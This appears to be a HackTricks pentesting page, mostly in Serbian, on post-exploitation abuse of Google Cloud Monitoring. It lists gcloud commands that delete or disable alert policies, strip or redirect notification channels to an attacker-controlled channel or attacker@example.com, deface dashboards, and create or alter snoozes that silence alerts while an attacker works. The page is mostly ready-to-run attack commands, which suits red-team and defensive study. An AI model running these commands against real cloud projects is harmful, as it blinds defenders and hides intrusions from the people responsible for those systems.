# GCP - Monitoring Post Exploitation

{{#include ../../../banners/hacktricks-training.md}}

## Monitoring

Za više informacija proverite:

{{#ref}}
../gcp-services/gcp-monitoring-enum.md
{{#endref}}

Za druge načine ometanja logova proverite:

{{#ref}}
gcp-logging-post-exploitation.md
{{#endref}}

### `monitoring.alertPolicies.delete`

Obrišite politiku upozorenja:
```bash
gcloud alpha monitoring policies delete <policy>
```
### `monitoring.alertPolicies.update`

Poremetite politiku upozorenja:
```bash
# Disable policy
gcloud alpha monitoring policies update <alert-policy> --no-enabled

# Remove all notification channels
gcloud alpha monitoring policies update <alert-policy> --clear-notification-channels

# Chnage notification channels
gcloud alpha monitoring policies update <alert-policy> --set-notification-channels=ATTACKER_CONTROLLED_CHANNEL

# Modify alert conditions
gcloud alpha monitoring policies update <alert-policy> --policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... }"
# or use --policy-from-file <policy-file>
```
### `monitoring.dashboards.update`

Izmenite kontrolnu tablu da je ometate:
```bash
# Disrupt dashboard
gcloud monitoring dashboards update <dashboard> --config='''
displayName: New Dashboard with New Display Name
etag: 40d1040034db4e5a9dee931ec1b12c0d
gridLayout:
widgets:
- text:
content: Hello World
'''
```
### `monitoring.dashboards.delete`

Obriši kontrolnu tablu:
```bash
# Delete dashboard
gcloud monitoring dashboards delete <dashboard>
```
### `monitoring.snoozes.create`

Spriječite politike da generišu upozorenja kreiranjem snoozer-a:
```bash
# Stop alerts by creating a snoozer
gcloud monitoring snoozes create --display-name="Maintenance Week" \
--criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \
--start-time="2023-03-01T03:00:00.0-0500" \
--end-time="2023-03-07T23:59:59.5-0500"
```
### `monitoring.snoozes.update`

Ažurirajte vreme snoozer-a kako biste sprečili kreiranje upozorenja kada je napadač zainteresovan:
```bash
# Modify the timing of a snooze
gcloud monitoring snoozes update <snooze> --start-time=START_TIME --end-time=END_TIME

# odify everything, including affected policies
gcloud monitoring snoozes update <snooze> --snooze-from-file=<file>
```
### `monitoring.notificationChannels.delete`

Obriši konfigurisan kanal:
```bash
# Delete channel
gcloud alpha monitoring channels delete <channel>
```
### `monitoring.notificationChannels.update`

Ažurirajte oznake kanala da biste ga omeli:
```bash
# Delete or update labels, for example email channels have the email indicated here
gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels
gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com
```
{{#include ../../../banners/hacktricks-training.md}}
